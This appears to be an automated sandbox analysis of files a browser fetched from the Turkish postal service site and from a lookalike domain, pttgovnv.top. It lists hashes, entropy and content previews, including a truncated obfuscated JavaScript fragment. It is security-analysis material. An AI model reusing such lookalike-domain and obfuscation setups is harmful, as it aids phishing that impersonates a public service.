          Preview:if(!window.ACJS){window.ACJS={};}window.ACJS.linkify=function(u){"use strict";var e="aaa aarp abarth abb abbott abbvie abc able abogado abudhabi ac academy accenture accountant accountants aco actor ad adac ads adult ae aeg aero aetna af afl africa ag agakhan agency ai aig airbus airforce airtel akdn al alfaromeo alibaba alipay allfinanz allstate ally alsace alstom am amazon americanexpress americanfamily amex amfam amica amsterdam analytics android anquan anz ao aol apartments app apple aq aquarelle ar arab aramco archi army arpa art arte as asda asia associates at athleta attorney au auction audi audible audio auspost author auto autos avianca aw aws ax axa az azure ba baby baidu banamex bananarepublic band bank bar barcelona barclaycard barclays barefoot bargains baseball basketball bauhaus bayern bb bbc bbt bbva bcg bcn bd be beats beauty beer bentley berlin best bestbuy bet bf bg bh bharti bi bible bid bike bing bingo bio biz bj black blackfriday blockbuster blog bloomberg blue bm
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:RIFF (little-endian) data, Web/P image
          Category:downloaded
          Size (bytes):7148
          Entropy (8bit):7.945839730308709
          Encrypted:false
          SSDEEP:96:N7ZAXeFaEn8qr8WbCYt5+KIcr/UrowzfTIHxRn7UgUG7jvxPemLbPppFIjIIle:dZAuFeWbCYtCroKix93U2xPe2aIC
          MD5:641DD16D1D00C8604EB6179270111AE9
          SHA1:184E0869FA5B954733CD187B9C9AFC8E6565BC92
          SHA-256:9A893C19F8C7DB3E1BC28AC41802909856003C35040A6091F8C02B59D1ED5CD2
          SHA-512:DFDE9BF1B3F449C9B157324C952C4213A4828A084BC3BD37AB6801C2E916942A45203C57E41B774D54EF60E1100204BEE5D0CA453B9835791C08F2BAAC62BF63
          Malicious:false
          Reputation:low
          URL:https://www.ptt.gov.tr/_next/image?url=%2F_next%2Fstatic%2Fmedia%2F183logo.a09f11f7.png&w=256&q=75
          Preview:RIFF....WEBPVP8X...........e..ALPH.......m.9..m.y....&J....-...........Mp....-...I..Df.K...u.sO.t..ODL..... x.. ..0.....&F`.C...rE....M./.ZBW.........Bu..".......L...g.V...\.t1.?L{...I.l...:..._b'm.w..h.Y\...>..Z..+df.F.;IO.....g...lw............../...S.....^q.u.Xo.Q...k...J.k5B...M.1.7...Y.....I...=....>...^.k..b.J...1c..;~....k.s..FW,.....7..@...k..`..BX.G/.1.e....M..z.....(.Xw.c....c.G....D..c..;.mq...1.".......=....j..9..^...k......d? ."..q.c.<.?...m.0~...;.X......xA..v;.8.K.....;.2...D.1.fnP..gN.\;.Q.2..oxwV...z#...O.\...o%,n....3i..S.<Z.D.Q..^..``..L...C....)I.g..Q.<..}*?.J....T.?.....u|......$..go>rt_.....T-L..%.>...jO.\;.L..PI.H..ce.....j.,.x.31U.$.j..&..m.+..Zw.$.J...../.v.NZ.....S...<.Jw.EvV*.Z.7..As.+..:..&6...4..%...R...Jk.q.S....l|q...~<....\...o....m...Uu...h.4.....+...24.`M.W.9...k..h..D.......L....1..4g^.m?.....";.....l..on..pk..4)LsI..XZ.h........5s..`..Em.../.....N*r.SU.np...U.D..{...J....L.U..8.
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:JSON data
          Category:dropped
          Size (bytes):41
          Entropy (8bit):4.180365114215879
          Encrypted:false
          SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
          MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
          SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
          SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
          SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
          Malicious:false
          Reputation:low
          Preview:{"code":1,"message":"Session ID unknown"}
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (3653)
          Category:downloaded
          Size (bytes):3701
          Entropy (8bit):5.228131891228675
          Encrypted:false
          SSDEEP:48:kNfY1SNf36JTAgtUNflBI3EkKHWRufQWTWDKDWDggZj2rZlVgZ1t:Ou8v6JT7+jCKHfqXnNJ
          MD5:239EE53CB3C3C49D0E1B9D0D23E5DA52
          SHA1:AA127BC5FD2B93B3ACA49EC673C37881094F9629
          SHA-256:C05E73D2B9E70CF33428CAF11087915B75F82B2F4342048EE54B823EB2A99431
          SHA-512:E0493B3844DA9B8D97837FF39218CF76F83296A6271D3B66FC1DDEBB0B5528AF37EFA0E57ADAB09246C908C0FEA0B39F74D508E6261E1B17829BAB7562FAB6B8
          Malicious:false
          Reputation:low
          URL:https://www.ptt.gov.tr/_next/static/css/2425cba10de1645b.css
          Preview:.styles_container__uvZ2S{position:fixed;top:0;right:0;left:0;bottom:0;background-color:rgba(0,0,0,.8);-webkit-backdrop-filter:blur(5px);-moz-backdrop-filter:blur(5px);-o-backdrop-filter:blur(5px);backdrop-filter:blur(5px);z-index:5;overflow-y:auto}.styles_container__uvZ2S>i{position:absolute;top:1.5rem;right:2rem;color:#fff;font-size:1.5rem!important}.styles_container__uvZ2S>.styles_body__Y9gTP{margin-top:4.5rem;padding:0 2rem}.styles_container__sX9Do{position:fixed;top:0;right:0;left:0;bottom:0;background-color:rgba(0,0,0,.8);-webkit-backdrop-filter:blur(5px);-moz-backdrop-filter:blur(5px);-o-backdrop-filter:blur(5px);backdrop-filter:blur(5px);z-index:5;overflow-y:auto}.styles_container__sX9Do>.styles_inputField__2P_Kd{position:relative;margin:4rem 1rem 1rem;padding:1rem}.styles_container__sX9Do>.styles_inputField__2P_Kd>input[type=text]{background-color:#eee;width:100%;height:3rem;padding:0 9rem 0 1rem;border:none;border-radius:2rem}.styles_container__sX9Do>.styles_inputField__2P_Kd>
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:RIFF (little-endian) data, Web/P image
          Category:downloaded
          Size (bytes):4546
          Entropy (8bit):7.904885231107719
          Encrypted:false
          SSDEEP:96:ar1jToly4eiMeo/826voWBX99AmMLGHtGNkWcebQxy:ufVR5eo/8Vvo2XYLGHYrcebQxy
          MD5:F33F254A85BDD91ACA8C88DF12D99ACB
          SHA1:C85F7731A9B5BD2B95394D2145B6F63B1039ACE1
          SHA-256:4EC10EE6A2F0D8A0FD1E6CC0A231AEF9ED1E9447582D08795436FC33330EBC23
          SHA-512:076B426C5B3C3C9D6B507300F5C504680683DD3793CEFCA18310BDE9D7210297C0567DC3B7C858B79ABBCAF2B0D16A8EC8BC81D438B923D23401F85FF902C345
          Malicious:false
          Reputation:low
          URL:https://www.ptt.gov.tr/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Ffooter-logo.568f7be2.png&w=256&q=75
          Preview:RIFF....WEBPVP8X...........N..ALPHj........9......I..m[...m.v...m...R+.*..s.<q.c^.z.............z.....:i)m.n).e.{..p.Y.,C.y..N...;..s.i.o.YF.....|......>.S....../.....p>lm..g.\.B.......n...n3.7......XL...*9...68...7.<v...Z..!....S.c.!K.....\....c....,..Ra..80.1...$....+...|.h...a.....c..#.e.~...F=.-.9AM..Z.[..S|...BVk.O...b...w.~...R.$. }6.k.L..r..qT.\.Pj.\}.....Y.@.@Tk..=..a....A.M.p.%......Z.Vxf.Lz.....!D.~........5.h.H1."0%.*7.[k......N5..WO...s.!I...0'.....K1fR.g..`......I!f.....;|1.x....N.O..p....u.....B..b.._>jq.9..6.O.p..t..8.,x..Q.!K.1H./.=..m.S..3a'I..R..}<v2.,r...b....._n[o.x...t+n...&.@z{[`H.[../...$..$.?|Vp.^.r%%...D.`...k.4.;.L....BRk.Q.....:UO!W.z.;)2...=.{..G....._...S.t.J.l}~......&).R.Z.7...6`.......x..........{V.o...v..S..Y.K.T.5.2.]0..1.e..........q...F.')d..,.8....M...R....T{.........L?~..o........-....._./.."E.....b4....~...Z.Wm......k......9....>z..S..p.=....`iu..;.W)..)Ho.....pT5..r....U....'|...#...O.O
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:JSON data
          Category:dropped
          Size (bytes):41
          Entropy (8bit):4.180365114215879
          Encrypted:false
          SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
          MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
          SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
          SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
          SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
          Malicious:false
          Reputation:low
          Preview:{"code":1,"message":"Session ID unknown"}
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (39101), with CRLF, LF line terminators
          Category:downloaded
          Size (bytes):172590
          Entropy (8bit):5.113436869391424
          Encrypted:false
          SSDEEP:3072:78krN709gMGFiyPG9AiSLCLk4JE+LJNJk1:Hrl09JGFiZg+k4JE+LJNJk1
          MD5:FE27E9666DF98D501D80834A39E5238C
          SHA1:A7E2CF51841EC650E758D0153F77A69ECF61C300
          SHA-256:A243B30A3907E2913AD2E36DDD4C435AFC5267085F66B26C35972500F95D7C3E
          SHA-512:96E652BE623CA48BF219D4B71EEFDA0448B20479E8917E61CC38EFEE3CB538BDC3B1E05D9F8FE7929EA326DFC5B85F1596B32E585AE12BA8074E74CEEBD5273D
          Malicious:false
          Reputation:low
          URL:https://www.ptt.gov.tr/_next/static/css/fdc30eafd5b8da2a.css
          Preview::root{--bgColor:#f1f1f1;--pttGreenColor:#00a9ce;--pttYellowColor:#ffc72c;--pttLinkColor:#53565a;--primaryBgColor:#50a5ff;--darkPrimaryBgColor:#007cff;--secondaryBgColor:#858585;--darkSecondaryBgColor:#656565;--successBgColor:#30c781;--darkSuccessBgColor:#249b63;--dangerBgColor:#e34a4a;--darkDangerBgColor:#bd3c3c;--warningBgColor:#ffc72c;--darkWarningBgColor:#cda631;--warningFontColor:#5a4915;--infoBgColor:#41d2d9;--darkInfoBgColor:#33a7ad;--lightBgColor:#fff;--lightFontColor:#333;--lightDarkBgColor:#f1f1f1;--grayBgColor:#3d4b54;--darkGrayBgColor:#252e33;--linkBgColor:transparent;--linkFontColor:#888;--darkLinkBgColor:transparent;--modalInOutAnimation:visibility 0.2s,opacity 0.2s ease-in-out;--containerPadding:1rem 10rem;--containerHeight:calc(100vh - 145px);--borderRadius:2rem;--position:0 0 0 0;--fontWeight:600;--boxShadow:0 5px 15px -5px rgba(0,0,0,.2);--transition:all 0.2s ease-in-out;--zIndex:10}*{margin:0;padding:0;-o-box-sizing:border-box;box-sizing:border-box;font-size:.9rem;fon
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
          Category:dropped
          Size (bytes):19866
          Entropy (8bit):7.886038247408446
          Encrypted:false
          SSDEEP:384:dSpd2e4QRiLuY9aokvzerh0OuGo8dFoCrIQl5JQwI+h5uYMCbmWxr2xyrBkh+:mMJQw19a17erOo1dZrtzXmVpOs+
          MD5:7F20E1AD732C6686C1C7F0353209DDCC
          SHA1:057F78EFD3A085BDE99A5FF105F5CCB2A491F1DA
          SHA-256:181E423A80ADDA5EA6EBBECFA7D787AD97BFAF0E778EDEAD79F4B3697A24D544
          SHA-512:05D12844B31B6F63FB5DE9ADFA83C587C4C350A3E81D32516F40D69FDA94ACC85DE78E012C5F34864BDF48CAB2DBF56308DE723B0B20A0BA9559ABB5718620DB
          Malicious:false
          Reputation:low
          Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..M'IDATx....x\wy.....H..k.%Cn....D!$h.B.M.`e.fi..e.l..-V..l!...,......-...\..F..@!.%!...1!!$!...%.%..=.?..h$.9s.3...<'.n3g......522"....,U.....B.....q... .........@.....!.........B.....q....8........@.....!.........B.....q....8........@.... ..........B....!.....8........@.... ..........B....!.....8.........q... .........@.....!.....8.........q... .........@.....!.....8...B.....q... .........@.....!.....8...B.....q... .........@.....!.........B.....q... .........@.....!.........B.....q....8........@.... ..........B.....q....8........@.... ..........B....!.(I.%am......7kdd....B\....k.jm.....23.?.So..fm.Q9;.M..T..."t..........TD.C=..0.. ........-..km....p....R..].......<.c.3..........gk.:......f.x...8Th...LS..{.}.l...M.....v....0...p.J...A.%...(.&.X.F.......q..4_.Mp.L.-imi...q}...\1.M.K.x..?.x.........~M...n.....8 . .........5....>.Q...V.I.|...N..7.o.[}...C?*.;..k.U....C.P4
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (3185)
          Category:downloaded
          Size (bytes):3352
          Entropy (8bit):4.914377701737588
          Encrypted:false
          SSDEEP:48:uZo8/L+IJWmQq+v+dDKopvu+ztL+F/+wI+weAzT+RV+VAPsAvqeghOHHy3VzoRvO:/gA6eA2+AbdEK7pcXVxZaIJICNMM
          MD5:F9250AB91F84BFC307CC3F1C2C7160A0
          SHA1:A53E910029C74D8F804634C876025452FED25CEF
          SHA-256:3DB5B39821A3FD830934435E760762A2A4BDE1A46BB5A47FAAE1C4A45202B2D7
          SHA-512:B3DFF956882D7491593A37A4CCE28474C7E01BDC243CB76EC87FEAD18CF9B48A2325DA8A8DB07875895C62396632F6B77E00F913950D1CDE08932B29FDCFF264
          Malicious:false
          Reputation:low
          URL:https://chatserver.alo-tech.com/static/assets/css/owl.carousel.min.css
          Preview:/**. * Owl Carousel v2.3.4. * Copyright 2013-2018 David Deutsch. * Licensed under: SEE LICENSE IN https://github.com/OwlCarousel2/OwlCarousel2/blob/master/LICENSE. */. .owl-carousel,.owl-carousel .owl-item{-webkit-tap-highlight-color:transparent;position:relative}.owl-carousel{display:none;width:100%;z-index:1}.owl-carousel .owl-stage{position:relative;-ms-touch-action:pan-Y;touch-action:manipulation;-moz-backface-visibility:hidden}.owl-carousel .owl-stage:after{content:".";display:block;clear:both;visibility:hidden;line-height:0;height:0}.owl-carousel .owl-stage-outer{position:relative;overflow:hidden;-webkit-transform:translate3d(0,0,0)}.owl-carousel .owl-item,.owl-carousel .owl-wrapper{-webkit-backface-visibility:hidden;-moz-backface-visibility:hidden;-ms-backface-visibility:hidden;-webkit-transform:translate3d(0,0,0);-moz-transform:translate3d(0,0,0);-ms-transform:translate3d(0,0,0)}.owl-carousel .owl-item{min-height:1px;float:left;-webkit-backface-visibility:hidden;-webkit-touch-c
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (6251)
          Category:downloaded
          Size (bytes):6299
          Entropy (8bit):5.275804119350307
          Encrypted:false
          SSDEEP:96:wlBVCnW9nYKvjmGsxWmRxybPlH+xPVVBqmhq50xBmfxPDjRLQ2jc6:wdCnWSKv3MjGcxfB+UIBZl
          MD5:22F20AFA6247DF798587ABA70C5F7BFB
          SHA1:CA40F0F78FFF921142925C410027675DE1F0D967
          SHA-256:762A67F772461C6E06220D94D1D196D858D74F6C1A9F27C4186361CFA0BC951F
          SHA-512:E5FA88D00AD4736E931BB6CC6286F750EB263A5888F322DC52FB3A7200B90162991F15F1CD75DDB2B542113BA84FF0E0FF85D220724750FA3CE7100B5374E921
          Malicious:false
          Reputation:low
          URL:https://www.ptt.gov.tr/_next/static/css/21ec1dd6e7fd01ba.css
          Preview:.style_menuPanel__EhQlL{padding-left:1rem;background-color:#f8f8f8}.style_menu__geUjE{border-left:#00a6cc;background-color:#f8f8f8;position:sticky;overflow:scroll;top:0;max-height:100vh;padding:1.5rem .5rem 2rem 2rem}.style_menu__geUjE::-webkit-scrollbar{width:1rem;scroll-padding-top:20px}.style_menu__geUjE::-webkit-scrollbar-thumb{background:#e3e3e3;border-radius:100px;border:.25rem solid transparent;background-clip:content-box}.style_menu__geUjE>li{position:relative;width:95%;margin:.3rem 0 .3rem .3rem;cursor:pointer;color:var(--pttLinkColor);font-size:1rem}.style_menu__geUjE>li:after{content:"";position:absolute;left:-25px;top:0;width:20px;height:20px}.style_menu__geUjE>li i{position:absolute;top:.4rem;left:-1.4rem}.style_menu__geUjE>li>li i{position:absolute;top:.7rem;left:-1.8rem}.style_menu__geUjE>li>a>b{position:absolute;left:95%}.style_menu__geUjE>li>a{display:flex;align-items:center;padding:0 0 .5rem;width:100%;color:var(--pttLinkColor);font-size:1rem}.style_menu__geUjE>li>a:h
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):92
          Entropy (8bit):4.440074751043314
          Encrypted:false
          SSDEEP:3:kw3dA4jgWYHJiv3dA4jgW6QfpXD3dA4jgW6Qen:FtDjdYHJwtDjd6EpXDtDjd6h
          MD5:7C3F7E060745668041278118C0BB3D6D
          SHA1:E639F56695B3CC30D78DCE7A0084AA8299A1311A
          SHA-256:DE5341313A4DC5D982CA50AE4A491E84BC5E80B0F439D87F05FC3973C1B7E59A
          SHA-512:B12A692EF9BE5857423F2DF563B986E241F7161573B5A7F23190696D1B0A50C5DA453C7BD35641FE61695B459D0A7D76F8053A8E0E0CCBC6811F800AAB1532C6
          Malicious:false
          Reputation:low
          Preview:self.__MIDDLEWARE_MANIFEST=[];self.__MIDDLEWARE_MANIFEST_CB&&self.__MIDDLEWARE_MANIFEST_CB()
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (1732)
          Category:downloaded
          Size (bytes):1789
          Entropy (8bit):4.966814738906002
          Encrypted:false
          SSDEEP:24:dmhAoz1pmHXOKz1hq7RNz12OirjrJz1WBGXSz1Md+Fz1UHplZWJDMMErCBvCiz1Y:dVo7RTUjAZl18
          MD5:A162C2CB4B1C97F46CA2EA02094721C1
          SHA1:92A0AB61CE7EC2A8BAC3E3FB25CE90CC54458B5E
          SHA-256:EDD6045FF8F42A5DAA4C68BAB8CE163C33267C5F19985CED93F3089F1BFCA36D
          SHA-512:26C1E5AF5EC94744EB0116DE25DE4EBF7416F9FBFE0D6B0A3EB3D44B0C4022D0A52C54DE2D0EAAB6F22DFD91753FAF01B2658C28C366B79A203ED4A45A54CBE5
          Malicious:false
          Reputation:low
          URL:https://chatserver.alo-tech.com/static/assets/js/reconnecting-websocket.min.js
          Preview:// https://github.com/joewalnes/reconnecting-websocket/.function ReconnectingWebSocket(a){function f(g){c=new WebSocket(a);if(b.debug||ReconnectingWebSocket.debugAll){console.debug("ReconnectingWebSocket","attempt-connect",a)}var h=c;var i=setTimeout(function(){if(b.debug||ReconnectingWebSocket.debugAll){console.debug("ReconnectingWebSocket","connection-timeout",a)}e=true;h.close();e=false},b.timeoutInterval);c.onopen=function(c){clearTimeout(i);if(b.debug||ReconnectingWebSocket.debugAll){console.debug("ReconnectingWebSocket","onopen",a)}b.readyState=WebSocket.OPEN;g=false;b.onopen(c)};c.onclose=function(h){clearTimeout(i);c=null;if(d){b.readyState=WebSocket.CLOSED;b.onclose(h)}else{b.readyState=WebSocket.CONNECTING;if(!g&&!e){if(b.debug||ReconnectingWebSocket.debugAll){console.debug("ReconnectingWebSocket","onclose",a)}b.onclose(h)}setTimeout(function(){f(true)},b.reconnectInterval)}};c.onmessage=function(c){if(b.debug||ReconnectingWebSocket.debugAll){console.debug("ReconnectingWebSoc
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (1732)
          Category:dropped
          Size (bytes):1789
          Entropy (8bit):4.966814738906002
          Encrypted:false
          SSDEEP:24:dmhAoz1pmHXOKz1hq7RNz12OirjrJz1WBGXSz1Md+Fz1UHplZWJDMMErCBvCiz1Y:dVo7RTUjAZl18
          MD5:A162C2CB4B1C97F46CA2EA02094721C1
          SHA1:92A0AB61CE7EC2A8BAC3E3FB25CE90CC54458B5E
          SHA-256:EDD6045FF8F42A5DAA4C68BAB8CE163C33267C5F19985CED93F3089F1BFCA36D
          SHA-512:26C1E5AF5EC94744EB0116DE25DE4EBF7416F9FBFE0D6B0A3EB3D44B0C4022D0A52C54DE2D0EAAB6F22DFD91753FAF01B2658C28C366B79A203ED4A45A54CBE5
          Malicious:false
          Reputation:low
          Preview:// https://github.com/joewalnes/reconnecting-websocket/.function ReconnectingWebSocket(a){function f(g){c=new WebSocket(a);if(b.debug||ReconnectingWebSocket.debugAll){console.debug("ReconnectingWebSocket","attempt-connect",a)}var h=c;var i=setTimeout(function(){if(b.debug||ReconnectingWebSocket.debugAll){console.debug("ReconnectingWebSocket","connection-timeout",a)}e=true;h.close();e=false},b.timeoutInterval);c.onopen=function(c){clearTimeout(i);if(b.debug||ReconnectingWebSocket.debugAll){console.debug("ReconnectingWebSocket","onopen",a)}b.readyState=WebSocket.OPEN;g=false;b.onopen(c)};c.onclose=function(h){clearTimeout(i);c=null;if(d){b.readyState=WebSocket.CLOSED;b.onclose(h)}else{b.readyState=WebSocket.CONNECTING;if(!g&&!e){if(b.debug||ReconnectingWebSocket.debugAll){console.debug("ReconnectingWebSocket","onclose",a)}b.onclose(h)}setTimeout(function(){f(true)},b.reconnectInterval)}};c.onmessage=function(c){if(b.debug||ReconnectingWebSocket.debugAll){console.debug("ReconnectingWebSoc
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
          Category:downloaded
          Size (bytes):10360
          Entropy (8bit):7.772743411893453
          Encrypted:false
          SSDEEP:192:nIT6oZvIiGiCBjFDsnk/7vzukL1f3hBXF8h6UaM:nrodrGiGwnkTvKQ13W0Ux
          MD5:C7D382ABD20C03688E3C72F9AB09E535
          SHA1:D290EE4A0D10EBD46208206CB44C69C72C8DF2B5
          SHA-256:9DEC48B0372F2CB164F2FEBD05E909A1C7B49C1BE12E1A143BA7FBD43435EE6A
          SHA-512:997AD2487E21001921490F84979FFB4096F885DF5C938CB083C74E65B1316A98D02DB689C37E3FB1CC0A6DFED32432B7E6341DEEB3C98F9AA80532E59EC87BA6
          Malicious:false
          Reputation:low
          URL:https://pttgovnv.top/help/layout/images/35.png
          Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..(.IDATx...Mz.X.7`....+ ..............R+.....0...V....JVPf..+..C.u.\...#[....|.].G..s~:.....^..0,.....!...!...!..@...@...@................8...8...8...8..!...!...!..@...@...@................8...8...8...8..!...!...!..@...@...@................8...8...8...8..!...!...!..@...@...@................8...8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@...@................8...8...8..!...!...!..@...@...@...@................8...8...8..!...!...!..@...@...@...@................8...8...8..!...!...!..@...@...@...@................8...8...8..!...!...!...!.|..'..k.L..C.......M..\.q.x.?...3.G7.o.q]..hG.P.O.x}...l..b...sq..8..-\..<.'...y..tqL_..p.uv]n......:.J.;...IV.G.....bq#\:3..p..?^......<(5..t..5.s.EpZ.O..w-..[..UO..|..E.
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (2711), with no line terminators
          Category:dropped
          Size (bytes):2711
          Entropy (8bit):5.297296092227412
          Encrypted:false
          SSDEEP:48:HX2Ad1LBPjwWtQkMpNbdyQNfSWsn3IQD/hACyEjJPFncz:bLlrxadFdyTWsTFyCPFncz
          MD5:A75A86776204D842DB35D8ACA1B199FB
          SHA1:BA065388EE5E866897DBC75E163FE916B6A35623
          SHA-256:0914A1DE2F752F476BE576F73AA8EA358F8044FC0F7B6B29C76CE08853B4C889
          SHA-512:CD48C0DBC2431CC20B7A1CE96BB8B87DE856C4AA69AC95B617B6F8117642F1DA16709C381D30BBADCD68897A6AE6D887D76A3D8071843BB5965EB8BB1234914A
          Malicious:false
          Reputation:low
          Preview:(function(_0x3d87db,_0x4b5e47){const _0xfeb21e=a31_0x355e,_0x41d4e4=_0x3d87db();while(!![]){try{const _0xf4c543=parseInt(_0xfeb21e(0x126))/0x1*(parseInt(_0xfeb21e(0x12d))/0x2)+parseInt(_0xfeb21e(0x12b))/0x3+-parseInt(_0xfeb21e(0x12c))/0x4+-parseInt(_0xfeb21e(0x13a))/0x5*(-parseInt(_0xfeb21e(0x13e))/0x6)+-parseInt(_0xfeb21e(0x13b))/0x7+parseInt(_0xfeb21e(0x137))/0x8*(-parseInt(_0xfeb21e(0x132))/0x9)+parseInt(_0xfeb21e(0x125))/0xa*(parseInt(_0xfeb21e(0x13d))/0xb);if(_0xf4c543===_0x4b5e47)break;else _0x41d4e4['push'](_0x41d4e4['shift']());}catch(_0x4a9f2a){_0x41d4e4['push'](_0x41d4e4['shift']());}}}(a31_0x36de,0xbf971));const a31_0x28e7fb=(function(){let _0xc82145=!![];return function(_0x3eb778,_0x20dec3){const _0x5c3b89=_0xc82145?function(){const _0x3ac2d5=a31_0x355e;if(_0x20dec3){const _0x25b304=_0x20dec3[_0x3ac2d5(0x12a)](_0x3eb778,arguments);return _0x20dec3=null,_0x25b304;}}:function(){};return _0xc82145=![],_0x5c3b89;};}()),a31_0x193cc0=a31_0x28e7fb(this,function(){const _0xd7d826=a
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:Unicode text, UTF-8 text, with very long lines (18369)
          Category:dropped
          Size (bytes):18593
          Entropy (8bit):5.712888637345886
          Encrypted:false
          SSDEEP:384:xE+fKMCY42wpgfvlqjUU4Qar3OTLc6rZ0opgTMFIowsPN:xEhFpWqjUURCeTo6rZ0/T+IoV
          MD5:615C089C71C979729E2BCF60A61D7934
          SHA1:4A3FCB37162D27CFCC228E4606266F98354D77E4
          SHA-256:A8D792CFA16979C7A84EB1BDBB4107885941F7901C25944EA96EE2863FC42406
          SHA-512:C0DB5C73DF1E01CC845BF365CA3702D2358D983DCC7C8E86283734BDD38F0D2DAC2C3D3AF14BB59927C435DB8CFB37B62A6DE09C3A36A4206F4D65F1E3FE3ADD
          Malicious:false
          Reputation:low
          Preview:/*!. * UAParser.js v0.7.21. * Lightweight JavaScript-based User-Agent string parser. * https://github.com/faisalman/ua-parser-js. *. * Copyright . 2012-2019 Faisal Salman <f@faisalman.com>. * Licensed under MIT License. */.(function(window,undefined){"use strict";var LIBVERSION="0.7.21",EMPTY="",UNKNOWN="?",FUNC_TYPE="function",UNDEF_TYPE="undefined",OBJ_TYPE="object",STR_TYPE="string",MAJOR="major",MODEL="model",NAME="name",TYPE="type",VENDOR="vendor",VERSION="version",ARCHITECTURE="architecture",CONSOLE="console",MOBILE="mobile",TABLET="tablet",SMARTTV="smarttv",WEARABLE="wearable",EMBEDDED="embedded";var util={extend:function(regexes,extensions){var mergedRegexes={};for(var i in regexes){if(extensions[i]&&extensions[i].length%2===0){mergedRegexes[i]=extensions[i].concat(regexes[i])}else{mergedRegexes[i]=regexes[i]}}return mergedRegexes},has:function(str1,str2){if(typeof str1==="string"){return str2.toLowerCase().indexOf(str1.toLowerCase())!==-1}else{return false}},lowerize:function
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
          Category:downloaded
          Size (bytes):23451
          Entropy (8bit):7.830242871837404
          Encrypted:false
          SSDEEP:384:ult4ezgA7TRsHmD6+Hv/o92O7/h+y04TS8do9O4NZ0VQFdxYYRfW4By:uQeEA7TaGW+HoYM/h+TS9SJAQXFWQy
          MD5:2C9ACA8B197F0D642CCFF28D6B23289D
          SHA1:57CDD6D8F177242E12364C419CCA4BFCF6D72922
          SHA-256:6C8B32F54CD73CD08B9B79D0F2491E5195983FABD0421BBEB99A8EA3CB86256F
          SHA-512:6BB8DADF816B2BFB10F59A55803346CD17A9BCCA628BEF4840B9359EBA0D3204B7D07CBCEBFF3BE2093847CE35D490696DBA2EAA965675BD8E7B7CFDAA271C3C
          Malicious:false
          Reputation:low
          URL:https://pttgovnv.top/help/layout/images/51.png
          Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..[(IDATx....c.}.y.......1..K.y.L..j.,1v\j......_c.d.....^p........^...$i5.$...RA..tw5..3..S9....U.@0<.. .=,.U0.%.Kw...{ZGG.JW.UI..|@]]*I..s.t>..s..(.c......E...... q.............................H...........H..... q....H..... q.............................H...........H..... q....H..... q.......... q.................H...........H..... q....H..... q.......... q.............................H..... q....H..... q.......... q.............................H............ q.............................H...........H..... q....H..... q.............................H...........H..... q....H..... q.......... q.................H...........H..... q....H..... q.......... q.............................H..... q....H..... q.......... q.............................H............ q.............................H...........H..... q....H..... q.............................H...........H..... q....H..... q.......... q.....
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:JSON data
          Category:downloaded
          Size (bytes):41
          Entropy (8bit):4.180365114215879
          Encrypted:false
          SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
          MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
          SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
          SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
          SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
          Malicious:false
          Reputation:low
          URL:https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liSfj&sid=6Pzg8-8CUphQpNENBQUa
          Preview:{"code":1,"message":"Session ID unknown"}
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
          Category:downloaded
          Size (bytes):12814
          Entropy (8bit):7.837700315737001
          Encrypted:false
